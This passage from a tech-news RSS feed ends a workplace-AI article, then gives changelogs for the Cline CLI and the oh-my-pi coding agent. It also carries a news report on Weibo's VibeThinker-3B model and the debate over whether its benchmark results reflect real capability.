<p>While Lowmaster acknowledges that “overreliance on AI tools” can sometimes lead to “cases of poor employee judgment or low-quality output,” one of the “biggest barriers” Gartner’s research has uncovered is an overall “lack of trust in the accuracy of AI-generated output.” When employees shift accountability to bots, this can create additional work for other employees who are left to check or redo AI-generated work.</p>



<p>“Any major tech shift can feel impersonal at first, but businesses will always need professionals who can apply the technology and collaborate across teams. Companies that position AI as more of a support tool, rather than a replacement, will likely see stronger employee interest,” says Robert Half’s Slabinski.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CLI v3.0.25]]></title>
<description><![CDATA[Added ClinePass support, with selectable ClinePass models in the model picker
Made model picker sections expandable
Added MCP server support to plugins, including authorizing plugin MCP OAuth during install
Encouraged parallel tool calls for faster task execution
Capped tool output for bash comma...]]></description>
<link>https://tsecurity.de/de/3603533/downloads/cli-v3025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603533/downloads/cli-v3025/</guid>
<pubDate>Wed, 17 Jun 2026 05:32:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Added ClinePass support, with selectable ClinePass models in the model picker</li>
<li>Made model picker sections expandable</li>
<li>Added MCP server support to plugins, including authorizing plugin MCP OAuth during install</li>
<li>Encouraged parallel tool calls for faster task execution</li>
<li>Capped tool output for bash commands and file reads to keep large output within context limits</li>
<li>Allowed ranged reads on large files</li>
<li>Fixed apply_patch to fail when a hunk is skipped</li>
<li>Fixed run_commands to return captured stdout on failure and handle split heredocs</li>
<li>Fixed search tools to treat zero results as success</li>
<li>Fixed disabled-reasoning handling for StepFun flash</li>
<li>Fixed history resume rendering isolation</li>
<li>Fixed the Hugging Face URL</li>
<li>Fixed Cline OAuth token formatting in provider config</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/cli-v3.0.24...cli-v3.0.25"><tt>cli-v3.0.24...cli-v3.0.25</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Weibo’s tiny VibeThinker-3B has the AI world arguing over benchmarks again]]></title>
<description><![CDATA[On Sunday, a team of nine researchers at Sina Weibo — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a 14-page technical report to arXiv that sent shockwaves through the AI research community. Their claim: ...]]></description>
<link>https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</guid>
<pubDate>Wed, 17 Jun 2026 03:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On Sunday, a team of nine researchers at <a href="https://weibo.com/">Sina Weibo</a> — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a <a href="https://arxiv.org/pdf/2606.16140">14-page technical report</a> to arXiv that sent shockwaves through the AI research community. Their claim: a language model with just 3 billion parameters can match or exceed the reasoning performance of flagship systems from <a href="https://deepmind.google/">Google DeepMind</a>, <a href="https://openai.com/">OpenAI</a>, <a href="https://www.anthropic.com/">Anthropic</a>, and <a href="https://chat.deepseek.com/">DeepSeek</a> that are hundreds of times larger.</p><p>The model, called <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>, scored 94.3 on <a href="https://aime26.aimedicine.info/">AIME 2026</a> — the American Invitational Mathematics Examination, one of the most demanding standardized math competitions in the world. That figure places it alongside <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a>, a model with 671 billion parameters, and ahead of <a href="https://blog.google/products-and-platforms/products/gemini/gemini-3/">Gemini 3 Pro</a>, Google's high-performance flagship reasoning system, which scored 91.7. With a test-time scaling technique the team calls Claim-Level Reliability Assessment, the score climbs to 97.1, edging past virtually every system in the public record.</p><p>Within hours of publication, the paper had drawn 62 upvotes on <a href="https://huggingface.co/papers/2606.16140">Hugging Face's daily papers</a> feed, the model repository had accumulated 130 likes, and the <a href="https://github.com/WeiboAI/VibeThinker">GitHub repository</a> had reached 685 stars. But the reaction on social media was not uniformly celebratory. It was, in many cases, deeply skeptical.</p><p>"WHAT THE HELL is happening in AI?" wrote the user <a href="https://x.com/orcus108/status/2066876960073281582">@orcus108</a> on X, in a post that accumulated over 161,000 views. "A 3B parameter model just put up coding benchmark scores in the same league as Claude Opus 4.5… I genuinely don't know if this is a breakthrough or if the benchmarks are broken."</p><p>That tension — between genuine scientific advancement and the growing suspicion that AI benchmarks have become gameable to the point of meaninglessness — sits at the heart of the <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> story. And the answer matters enormously, not just for academic bragging rights, but for the multibillion-dollar question of whether the AI industry's relentless push toward ever-larger models is the only path to intelligence.</p><div></div><h2><b>Benchmark scores that defy the scaling laws of modern AI</b></h2><p>The results reported in the technical report are, by any conventional standard, extraordinary.</p><p>On the mathematics side, <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> achieved 91.4 on <a href="https://artificialanalysis.ai/evaluations/aime-2025">AIME 2025</a>, 94.3 on <a href="https://llm-stats.com/benchmarks/aime-2026">AIME 2026</a>, 89.3 on <a href="https://huggingface.co/datasets/MathArena/hmmt_feb_2025">HMMT 2025</a> (the Harvard-MIT Mathematics Tournament), 93.8 on <a href="https://huggingface.co/datasets/MathArena/brumo_2025">BruMO 2025</a> (the Brown University Math Olympiad), and 76.4 on <a href="https://huggingface.co/datasets/Hwilner/imo-answerbench">IMO-AnswerBench</a>, a benchmark comprising 400 problems at the level of the International Mathematical Olympiad. In coding, it posted an 80.2 Pass@1 on <a href="https://www.kaggle.com/benchmarks/open-benchmarks/livecodebench-release-v6">LiveCodeBench v6</a>, a benchmark designed to test executable code generation, and achieved a 96.1 percent acceptance rate on unseen <a href="https://leetcode.com/contest/">LeetCode weekly</a> and biweekly contests from late April through late May 2026. On instruction following, it scored 93.4 on <a href="https://huggingface.co/datasets/google/IFEval">IFEval</a>.</p><p>To put the parameter disparity in perspective: <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a> has 671 billion parameters — roughly 224 times the size of <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>. <a href="https://huggingface.co/zai-org/GLM-5">GLM-5</a>, from Zhipu AI, has 744 billion parameters. <a href="https://huggingface.co/moonshotai/Kimi-K2.5">Kimi K2.5</a>, from Moonshot AI, exceeds 1 trillion. VibeThinker-3B's 3 billion parameters could run on a consumer laptop.</p><p>The researchers frame this result not as an anomaly but as evidence for a broader theoretical claim. They introduce what they call the "<a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a>," which argues that different types of AI capability have fundamentally different relationships to model size. Verifiable reasoning — the kind tested by math competitions and coding challenges, where answers can be definitively checked — is what the paper calls a "parameter-dense" capability: one that can be compressed into a compact core. Open-domain knowledge, by contrast, is "parameter-expansive," requiring broad coverage across facts, concepts, and edge cases that inherently demands more parameters.</p><p>The paper acknowledges this distinction directly. On <a href="https://epoch.ai/benchmarks/gpqa-diamond">GPQA-Diamond</a>, a graduate-level science knowledge benchmark, VibeThinker-3B scored just 70.2 — well behind the 91.9 achieved by Gemini 3 Pro and the 87.0 scored by Claude Opus 4.5. The authors write that this gap "is consistent with our claim rather than a contradiction to it: the main finding is not that a 3B model has fully replaced leading general-purpose models, but that a small model can reach first-tier performance on many verifiable reasoning tasks."</p><div></div><h2><b>Inside the four-stage training pipeline that powers a tiny reasoning engine</b></h2><p><a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> is not built from scratch. It is post-trained on top of <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-3B">Qwen2.5-Coder-3B</a>, a compact foundation model from Alibaba's Qwen team, through what the Weibo AI researchers call the "Spectrum-to-Signal Principle" — a multi-stage pipeline first introduced in the team's earlier VibeThinker-1.5B work in November 2025.</p><p>The training unfolds in four major phases. The first is a two-stage supervised fine-tuning process that uses curriculum learning: the model first trains on a broad mixture of math, code, STEM reasoning, general dialogue, and instruction-following data, then shifts to a curated subset of harder, longer-horizon reasoning problems. In the second stage, samples with reasoning traces shorter than 5,000 tokens are discarded, and problems that <a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a> can solve more than 75 percent of the time are filtered out, forcing the model to focus on genuinely difficult challenges.</p><p>The second phase applies reinforcement learning across multiple domains — mathematics, code, and STEM — using the team's <a href="https://www.emergentmind.com/topics/maxent-guided-policy-optimization-mgpo">MaxEnt-Guided Policy Optimization</a> algorithm, or MGPO, which prioritizes training on problems at the model's current capability boundary rather than problems it already solves easily or finds impossible. Notably, the team found that a strategy that worked well at the 1.5B scale — progressively expanding the context window during RL training — actually hurt performance at 3B. They hypothesize that the stronger starting checkpoint meant that truncating reasoning traces during warm-up was no longer removing noise but disrupting valid reasoning patterns. The solution was to train with a single 64,000-token context window throughout.</p><p>Within the math RL phase, the team also introduces what it calls "<a href="https://arxiv.org/pdf/2606.16140">Long2Short Math RL</a>," a secondary optimization stage that redistributes rewards to favor shorter correct solutions over longer ones, reducing verbosity without sacrificing accuracy. The technique uses a zero-sum reward redistribution that avoids biasing the overall reward signal while nudging the model toward more efficient reasoning.</p><p>The third phase extracts high-quality reasoning trajectories from the RL-trained checkpoints and distills them back into a unified model through supervised fine-tuning. The team uses a "learning-potential score" — essentially the student model's perplexity on each teacher trajectory — to prioritize traces that are correct but that the student has not yet internalized. The final phase, called Instruct RL, applies reinforcement learning on instruction-following tasks using a combination of rule-based validators for format constraints and rubric-based reward models for open-ended quality assessment.</p><p><a href="https://x.com/f14bertolotti/status/2066752828505288902">Francesco Bertolotti</a>, an AI researcher who flagged the paper early on X, described the approach succinctly: "These results were achieved primarily through post-training refinements on Qwen2.5-Coder. The paper doesn't provide many details, but it appears they distill from RL ckpts and then do a final RL-based instruct RL." His post drew over 161,000 views.</p><div></div><h2><b>Real-world testing reveals the gap between benchmark scores and practical AI performance</b></h2><p>For every enthusiastic reaction, the paper drew an equally forceful objection. The AI research community in mid-2026 has grown deeply wary of benchmark-driven claims, and <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> arrived in an environment primed for suspicion.</p><p>"The benchmarks are literal pattern matching single file coding," wrote <a href="https://x.com/BigMoonKR/status/2066950583941214698">@BigMoonKR</a> on X. "It has no relation to actual coding work. I don't know how people still don't get this."</p><p>"Benchmaxxing," declared @<a href="https://x.com/oflu_bedirhan/status/2066883558388404717">oflu_bedirhan</a>, using a term that has become shorthand in the AI community for models that appear optimized specifically for benchmark performance at the expense of real-world utility.</p><p>The most pointed criticism came from users who actually downloaded and tested the model. "Just tried the full precision," wrote <a href="https://x.com/politilols/status/2066901234091438132">@politilols</a>. "It doesn't even know what a uv script (so the most popular Python dev tool) is. Haven't seen that in a single LLM in at least a year now. Benchmaxxed." When Bertolotti responded that the model seemed more focused on mathematical reasoning than practical coding, the user countered: "They include a livecodebench score. Zero chance that is reflective of the model."</p><p><a href="https://x.com/Itsdotdev/status/2066961630521385166">@Itsdotdev</a> raised a structural criticism: "Look into the benchmarks themselves and it probably won't be so shocking. Why no DeepSWE? Why none of the standard benchmarks SOTA providers use?" The user @AvenirReym posed a more diagnostic question: "If it holds on a benchmark made after the model's training cutoff, it's real. If it only wins on AIME-style sets that have been circulating for years, it's leakage."</p><p>The paper's authors appear to have anticipated these objections. The technical report states that training sets "have undergone strict benchmark decontamination," including n-gram-based filtering to remove "n-gram overlaps with evaluation sets."</p><p>The LeetCode contest evaluation — which covers contests from April 25 to May 31, 2026, dates that postdate any plausible training data cutoff — represents the most robust guard against data contamination concerns. On those contests, VibeThinker-3B passed 123 out of 128 first-attempt submissions, a 96.1 percent rate that exceeded GPT-5.2, Doubao Seed 2.0 Pro, Kimi K2.5, and Claude Opus 4.6 under identical evaluation conditions.</p><p>Still, real-world user reports suggest a significant gap between benchmark performance and practical utility — a phenomenon that has become familiar across the industry. "In LM Studio it only responds well to first question, next questions reply to the first question," reported <a href="https://x.com/luismolinaab/status/2066980744220528940">@luismolinaab</a>.</p><div></div><h2><b>Why a social media company may have found a crack in the scaling hypothesis</b></h2><p>Even the sharpest critics acknowledged that achieving these benchmark numbers at 3 billion parameters — regardless of how transferable they are to production use cases — is a meaningful engineering achievement. "Even if it's benchmaxxing doing so with 3B parameters is fascinating, goes to show how fast this field is progressing," wrote <a href="https://x.com/rohityin/status/2066913806287327302">@rohityin.</a></p><p>The observation cuts to a question that has consumed the AI industry since the advent of the scaling hypothesis: Is bigger always better? The conventional wisdom, articulated most famously in the Chinchilla scaling laws and reinforced by the commercial dominance of ever-larger foundation models, holds that more parameters and more training data reliably yield better performance. The economic corollary is stark: training and deploying frontier models costs tens or hundreds of millions of dollars, creating enormous barriers to entry.</p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> challenges that consensus — but only partially. The paper is careful to draw a boundary around its claims, distinguishing between tasks with "clear verification signals" and those that require broad factual knowledge. The Parametric Compression-Coverage Hypothesis explicitly argues that small models cannot replace large ones across the board.</p><p>"The true significance of VibeThinker-3B does not lie in proving that a 3B model can replace large-scale generalists," the paper states, "but rather in providing a concrete empirical signal: the development of compact models is no longer merely a passive compromise for deployment efficiency or cost control; it emerges as a promising research trajectory that is fundamentally complementary to the traditional parameter scaling paradigm."</p><p>Perhaps the most surprising element of the work is its provenance. Sina Weibo — publicly traded on Nasdaq and Hong Kong, with a market capitalization that fluctuates in the single-digit billions — is not a company typically associated with frontier AI research. Yet the VibeThinker series is Weibo's second major open-source AI contribution in seven months. </p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a>, released in November 2025, demonstrated that a model with just 1.5 billion parameters could outperform the original DeepSeek R1 on several math benchmarks — a result the team achieved for what it claimed was a post-training cost of just $7,800, compared to the $294,000 estimated for DeepSeek R1.</p><p>The research team is compact — nine authors, all listed as Sina Weibo Inc. employees. The model is released under the <a href="https://opensource.org/license/mit">MIT License</a>, one of the most permissive open-source licenses available, and the weights are freely downloadable from both <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">Hugging Face</a> and <a href="https://modelscope.cn/models/WeiboAI/VibeThinker-3B">ModelScope</a>. Within the first day of release, community members had already created GGUF quantizations and derivative models.</p><h2><b>Small models, big implications, and the question the AI industry can no longer avoid</b></h2><p>The most honest assessment of <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> may be that it is simultaneously less and more than what the benchmarks suggest. Less, because a model that struggles with basic knowledge of popular developer tools is unlikely to replace any production-grade coding assistant anytime soon. More, because the underlying insight — that reasoning ability and factual knowledge are partially decoupled, and that the former can be compressed far more aggressively than previously assumed — has profound implications for how the industry thinks about model design, deployment economics, and the accessibility of advanced AI capabilities.</p><div></div><p>If the <a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a> holds, it suggests a future in which small, specialized reasoning engines operate alongside large knowledge-rich models in hybrid architectures — a vision where a 3-billion-parameter model handles the logical heavy lifting while a larger system supplies the factual grounding. Such an architecture could dramatically reduce the cost of deploying AI reasoning capabilities, potentially bringing competition-level mathematical and coding performance to devices with modest hardware.</p><p>"The interesting part is that we're starting to separate knowledge from reasoning," wrote <a href="https://x.com/RealLambdaFlux/status/2066924260724265463">@RealLambdaFlux</a> on X. "A small model with strong post-training can punch way above its size on tasks with clear feedback."</p><p><a href="https://x.com/cmitsakis/status/2066850007693578352">@cmitsakis</a> suggested the practical endgame: "I think small models are the future for agents because they can use tools to get the knowledge and they can run fast and cheap."</p><p>Whether that future arrives through <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> specifically, or through the dozens of teams now racing to reproduce and extend these results, the paper has already accomplished something that no benchmark score can fully capture.</p><p>It has forced the AI community to confront an uncomfortable possibility: that for years, the industry may have been spending billions of dollars scaling up parameters to improve a kind of intelligence that could have fit, all along, on a laptop. The weights are public. The code is open. And the most important test isn't on any leaderboard — it's whether anyone can make a model this small actually useful in the real world.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.0.3]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Exported renderDelimitedThinking from the @oh-my-pi/pi-ai/dialect barrel so consumers can reuse the dialect's  envelope unwrap-and-rewrap logic (the only ./dialect/rendering primitive re-exported; the rest stay dialect-internal).

Fixed

Fixed OpenAI Responses/Codex tool sc...]]></description>
<link>https://tsecurity.de/de/3603377/tools/v1603/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603377/tools/v1603/</guid>
<pubDate>Wed, 17 Jun 2026 02:23:16 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Exported <code>renderDelimitedThinking</code> from the <code>@oh-my-pi/pi-ai/dialect</code> barrel so consumers can reuse the dialect's <code>&lt;thinking&gt;</code> envelope unwrap-and-rewrap logic (the only <code>./dialect/rendering</code> primitive re-exported; the rest stay dialect-internal).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenAI Responses/Codex tool schema normalization stripping provider-rejected regex lookaround patterns from MCP tool parameter schemas. (<a href="https://github.com/can1357/oh-my-pi/issues/2784" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2784/hovercard">#2784</a>)</li>
<li>Fixed OpenAI Responses parallel tool-call routing so late keyed argument deltas for a closed call are dropped instead of being appended to another open call.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for LaTeX color commands (<code>\textcolor</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>) in user-visible terminal prose and final chat to colorize output</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed STT dependency setup to validate recorder and model assets per <code>stt.modelName</code>, so switching speech models re-runs dependency checks and downloads for the new model</li>
<li>Changed STT startup with cached models to warm the speech model in the background and defer full model loading until transcription begins, reducing push-to-talk start latency</li>
<li>Allowed user-visible terminal and final-chat responses to include LaTeX math delimiters/commands and Mermaid <code>```mermaid</code> diagrams</li>
<li>Changed the hold-<code>Space</code> push-to-talk gesture to recognize a held bar from the <em>regularity</em> of the OS key auto-repeat rather than a raw space count or speed alone, so it no longer spams the editor, no longer eats deliberate space taps, and no longer triggers when the bar is smashed. Recording starts only after two consecutive inter-space deltas are "mechanical" — both fast (within ~120 ms) and near-identical, the metronomic signature of auto-repeat; the few pre-burst spaces typed are then tracked back out. Smashing (fast but jittery) and deliberate spacing (steady but slow) both keep typing real spaces and never start recording.</li>
<li>Updated markdown Mermaid rendering to color ASCII diagrams with the active theme and automatically choose a narrower layout that better fits the terminal width</li>
<li>Made the watched-session transcript sent to the advisor (and shown by <code>/advisor dump</code>) clearer: each turn now opens with a <code>### Session update</code> heading; watched-agent roles render as inline <code>**agent**:</code> / <code>**user**:</code> labels instead of level-2 headings that collided with the advisor's own turns; consecutive same-role messages collapse under one label (the watched agent emits one assistant message per tool call); and batched updates are joined by a blank line rather than a <code>---</code> rule.</li>
<li>Changed the compact transcript tool-intent prefix (<code>history://</code>, <code>/advisor dump</code>) from <code># </code> to <code>// </code> so intent lines read as comments instead of rendering as Markdown H1 headings.</li>
<li>Changed the advisor advice injected into the primary transcript from a <code>Advisor (...): - [severity] note</code> prose block to one <code>&lt;advisory severity="…" guidance="weigh, don't blindly obey"&gt;…&lt;/advisory&gt;</code> element per note, with XML-escaped bodies. (Relocated the shared <code>escapeXmlText</code> helper to <code>@oh-my-pi/pi-utils</code>.)</li>
<li>Reverted <code>/dump</code> and <code>/advisor dump raw</code> to the pre-16.x full verbose dump: system prompt, model/thinking config, tool inventory with parameters, and the message transcript rendered with markdown role headings (<code>## User</code>, <code>## Assistant</code>, <code>### Tool Call: &lt;name&gt;</code> with the call's <code>_i</code> intent as a <code>//</code> comment under the heading and the remaining arguments as a fenced YAML block, <code>### Tool Result: &lt;name&gt;</code>, plus <code>## Bash Execution</code>/<code>## File Mention</code>/summary sections) instead of the model's native-dialect turn envelopes and <code>&lt;invoke&gt;</code>/<code>&lt;parameter&gt;</code> XML tool calls. Dropped the compact default and the <code>[raw]</code> flag on <code>/dump</code>; the compact <code>→ tool(...) ⇒ ok</code> history format is no longer reachable from <code>/dump</code>. <code>/advisor dump</code> still defaults to compact, and <code>/advisor dump raw</code> now renders the same markdown dump (previously the model's native-dialect envelopes).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Whisper STT cache detection to require both encoder and decoder <code>.onnx</code> files, so partial model downloads now trigger a proper foreground download instead of being treated as fully cached</li>
<li>Fixed same-process <code>JsRuntime</code> cleanup so disposing an older inline/direct runtime no longer deletes a newer runtime's JS helper globals; inactive cmux/direct runtimes now re-activate their globals before sequential use while overlapping cross-runtime runs fail explicitly.</li>
<li>Fixed magic-keyword steering notices (<code>ultrathink-notice</code>, <code>orchestrate-notice</code>, <code>workflow-notice</code>) to be prepended before the related user message so they influence that same turn</li>
<li>Fixed dequeuing or popping queued user messages to remove their preceding hidden magic-keyword notice companions, preventing orphaned queued notices</li>
<li>Fixed queued user steers to auto-resume after interrupts even when the transcript tail is a preserved advisor card or other non-conversational custom message</li>
<li>Fixed queued user follow-up messages to remain queued after an interrupt and only run on explicit resume, even when an IRC wake leaves a provider-valid tail</li>
<li>Fixed stranded IRC asides to wake a response turn after interruption instead of remaining pending</li>
<li>Fixed accepted IRC asides to be flushed into the transcript during disposal instead of being discarded</li>
<li>Fixed interactive submissions made while the TUI had no active input waiter: they now start a real prompt directly, with steer fallback if a background turn races in, instead of queueing behind a non-resumable idle transcript and appearing to do nothing.</li>
<li>Fixed pressing Esc (or Alt+Up dequeue) while agent-authored messages were queued — advisor concern/blocker notes, hidden goal/plan/budget steers, IRC/extension asides — dumping their text into the user's editor. Editor restoration (<code>clearQueue()</code>), pending chips (<code>getQueuedMessages()</code>), and <code>popLastQueuedMessage()</code> now surface only genuinely user-authored queued messages (plain user turns and <code>attribution: "user"</code> custom messages like <code>/skill</code>). Plain Alt+Up dequeue leaves all other queued messages in place for the continuing stream; only the Esc interrupt path keeps just advisor cards (so abort's preservation still re-records them as visible advice) and drops other internal steers, so a user interrupt can't be silently undone by an auto-resume on leftover internal context. <code>queuedMessageCount</code> still reflects all actual queued work (advisor cards included) so <code>hasPendingMessages()</code>/RPC and the empty-submit abort gate stay accurate.</li>
<li>Fixed advisor <code>concern</code>/<code>blocker</code> advice being withheld from the running agent and then dumped as one burst at the next user prompt after a deliberate interrupt. A user interrupt latches advisor auto-resume suppression, but a non-user resume (synthetic/auto-continue, or a queued steer draining after the abort) leaves the run streaming with that latch still set, so every interrupting note was parked hidden in the next-turn queue instead of steered into the live turn — the agent never heard the advisor mid-run and the backlog flushed all at once on the next prompt. Suppression now only withholds interrupting advice while the agent is idle (or still tearing the interrupted turn down); once a turn is streaming again the note is steered in live, since steering an active run never auto-resumes a stopped one. A concern that strands in the steer queue past the resumed turn's final poll is reclaimed as visible advice when the agent settles (mirroring abort), so it neither auto-resumes the stopped run nor lingers to flush at the next prompt.</li>
<li>Fixed <code>omp --continue</code>/<code>-c</code> sometimes resuming into a subagent transcript instead of the interactive session. Subagent (and HTML-export) <code>SessionManager.open()</code> calls run in the parent's terminal and were clobbering the per-TTY <code>--continue</code> breadcrumb with their own artifact-dir session file; these headless opens now suppress the breadcrumb. <code>continueRecent()</code> also recovers already-poisoned breadcrumbs by resolving any session file inside a parent's artifacts dir (<code>&lt;parent&gt;/&lt;agentId&gt;.jsonl</code>) back up to the top-level session.</li>
<li>Fixed the Agent Hub stacking duplicate <code>Agent Hub · N running</code> frames and stranding garbage rows in scrollback while navigating with subagents still streaming. The hub was a non-fullscreen overlay composited over a live transcript, so each time a running subagent's progress grew the frame and scrolled the window the previously-painted hub copy was pushed permanently into the terminal's native scrollback (which the engine can't rewrite). It now renders inline in the editor slot — the same anchored region every other selector and the <code>ask</code> tool use — riding the normal append-only commit path, so the transcript commits above it exactly once and the hub repaints in place instead of leaking copies. (Avoids borrowing the alternate screen.)</li>
<li>Fixed every subagent registering itself as its own parent in the agent registry (<code>parentId === id</code>), so the Agent Hub rendered each agent as <code>sub · of &lt;itself&gt;</code> and the ←← parent-navigation gesture looped on the same agent. The SDK was reusing <code>parentTaskPrefix</code> — the agent's own artifact/output-id prefix — as the registry parent link; spawns now pass a separate <code>parentAgentId</code> (the spawning agent's id: <code>Main</code> for top-level <code>task</code> spawns, the parent subagent for nested spawns and eval <code>agent()</code>, the focused agent for <code>/tan</code>) and the registry records that as the parent.</li>
<li>Fixed messaging a <code>parked</code> subagent that was restored from disk (Agent Hub scan, or a resumed/restarted session) failing with <code>cannot be revived (no reviver registered)</code> even though its transcript was intact. Such refs carry a session file but no in-memory reviver — the executor's live reviver closure dies with the spawning turn/process — so IRC sends and Agent Hub focus refused them. <code>AgentLifecycleManager.ensureLive</code> now cold-revives them through a persisted-subagent reviver factory (installed by the top-level interactive/RPC session) that rebuilds the subagent from its JSONL the way <code>--resume</code> rebuilds a session: it reopens the file and replays it through <code>createAgentSession</code>, but sources the runtime contract from a now-readable <code>session_init</code> record (<code>SessionManager.peekSessionInit</code>) so tools, system prompt, output schema, and kind are restored rather than resurrected as a default top-level session. <code>session_init</code> now also persists the effective <code>spawns</code> allowlist and read-summarization flag so a cold revive keeps the original capability surface (old files without them deny re-spawning rather than defaulting to wildcard). Isolated runs and pre-<code>session_init</code> files whose recorded workspace no longer exists stay transcript-only (<code>history://</code>).</li>
<li>Fixed the terminal window-title OSC writes (<code>setTerminalTitle</code>/<code>pushTerminalTitle</code>/<code>popTerminalTitle</code>) leaking escape sequences to a developer's terminal during <code>bun test</code>; they now skip when the terminal is headless (the test-runtime default), matching the <code>ProcessTerminal</code> render/probe suppression so interactive-mode tests no longer paint to the real terminal</li>
<li>Fixed empty CLI sessions being retained after opening <code>omp</code> and exiting without a prompt (<a href="https://github.com/can1357/oh-my-pi/issues/2800" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2800/hovercard">#2800</a>).</li>
<li>Fixed <code>hooks/pre/*.ts</code> and <code>hooks/post/*.ts</code> files discovered through <code>hookCapability</code> being registered in discovery but never loaded into the extension runner, so their <code>tool_call</code> handlers now run without a manual <code>settings.json</code> <code>extensions</code> entry (<a href="https://github.com/can1357/oh-my-pi/issues/2796" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2796/hovercard">#2796</a>).</li>
<li>Fixed startup model fallback choosing the plain OpenAI <code>gpt-5.5</code> provider before the Codex OAuth provider when both shared the same default model id, which could surface a misleading OpenAI 401 despite valid Codex credentials (<a href="https://github.com/can1357/oh-my-pi/issues/2807" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2807/hovercard">#2807</a>).</li>
<li>Fixed local auto-thinking classification for reasoning-capable tiny models by giving them the same safe answer budget as online reasoning classifiers, with a larger local floor for non-reasoning tiny models (<a href="https://github.com/can1357/oh-my-pi/issues/2808" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2808/hovercard">#2808</a>).</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the built-in <code>render_mermaid</code> tool and its <code>renderMermaid.enabled</code> setting, so it can no longer be invoked directly</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Removed</h3>
<ul>
<li>Removed rendering support for the <code>render_mermaid</code> tool from the web tool registry</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added <code>\tfrac</code> support to stacked display-math rendering so it now displays as a vertical fraction in <code>latexToBlock</code> output</li>
<li>Added markdown parsing for own-line display-math blocks (<code>$$...$$</code> and <code>\[...\]</code>) and delimiter-free <code>\begin{...}...\end{...}</code> math environments so block equations render via LaTeX-to-Unicode</li>
<li>Added stacked rendering of display-math fractions (<code>\frac</code>, <code>\dfrac</code>, <code>\cfrac</code>): the numerator is drawn over a horizontal bar over the denominator, with surrounding terms and <code>align</code>/<code>equation</code>-style environment rows aligned to the bar. Triggered for own-line <code>$$</code>/<code>\[</code> blocks, bare <code>\begin{...}</code> environments, and a paragraph whose sole content is a single display-math span; inline <code>$...$</code> fractions stay single-line (<code>½</code>, <code>(a+b)/c</code>)</li>
<li>Added bare math auto-rendering in <code>renderMathInText</code> for math-shaped lines and math environment blocks that omit <code>$</code>/<code>\(</code> delimiters</li>
<li>Added LaTeX-to-Unicode rendering for markdown math spans, converting <code>$$...$$</code>, <code>$...$</code>, <code>\(...\)</code>, and <code>\[...\]</code> into readable Unicode in Markdown output</li>
<li>Exported LaTeX conversion helpers from the package entrypoint so consumers can call <code>latexToUnicode</code>, <code>latexToBlock</code>, <code>renderMathInText</code>, <code>inlineMathSpanEnd</code>, and <code>isBareMathEnvironment</code> directly</li>
<li>Expanded LaTeX-to-Unicode conversion coverage for additional math fonts, delimiters, extensible arrows, layout environments, cancel/brace annotations, references, and AMS symbols</li>
<li>Added ANSI color rendering for LaTeX <code>\textcolor</code>, scoped <code>\color</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>, including xcolor/CSS color parsing and truecolor/256-color terminal output</li>
<li>Added an optional <code>maxWidth</code> parameter to <code>MarkdownTheme.resolveMermaidAscii</code> to allow diagram resolvers to fit ASCII output to the available content width</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed markdown math rendering to preserve multiline layout for display equations, keeping <code>\\</code> row breaks as separate output lines (including inside list items)</li>
</ul>
